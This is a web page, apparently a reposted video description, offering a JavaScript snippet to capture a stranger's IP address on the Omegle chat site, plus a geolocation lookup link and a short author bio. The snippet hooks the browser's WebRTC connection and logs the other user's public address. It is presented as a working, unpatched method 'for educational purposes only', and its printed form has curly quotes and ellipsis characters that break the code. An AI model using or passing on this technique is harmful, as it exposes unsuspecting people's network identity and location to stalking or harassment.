Computer NetworksNETWORKS

How To Find Someones IP address on Omegle. (WORKING 2020)

🛑 This Video Is for educational Purposes only, i don’t recommend to recreate or retry any of the scenes shown in this video. i dont take any responsibility for further actions. 🛑

🔴 IP Finder Location Link: https://tools.keycdn.com/geo?host=
🔴 Omegle Link: https://www.omegle.com/
🔴 SCRIPT IS IN THE DESCRIPTION!!!!!!!

THIS METHOD IS NOT PATCHED TRIED IT JUST NOW (USE THIS)
window.oRTCPeerconnection = window.oRTCPeerConnection || window.RTCPeerConnection

window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerconnection(…args)

pc.oaddIceCandidate = pc.addIceCandidate

pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)

if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)

}

return pc
}

source

ip address

Alice AUSTIN

Alice AUSTIN is studying Cisco Systems Engineering. He has passion with both hardware and software and writes articles and reviews for many IT websites.

Leave a Reply

Your email address will not be published. Required fields are marked *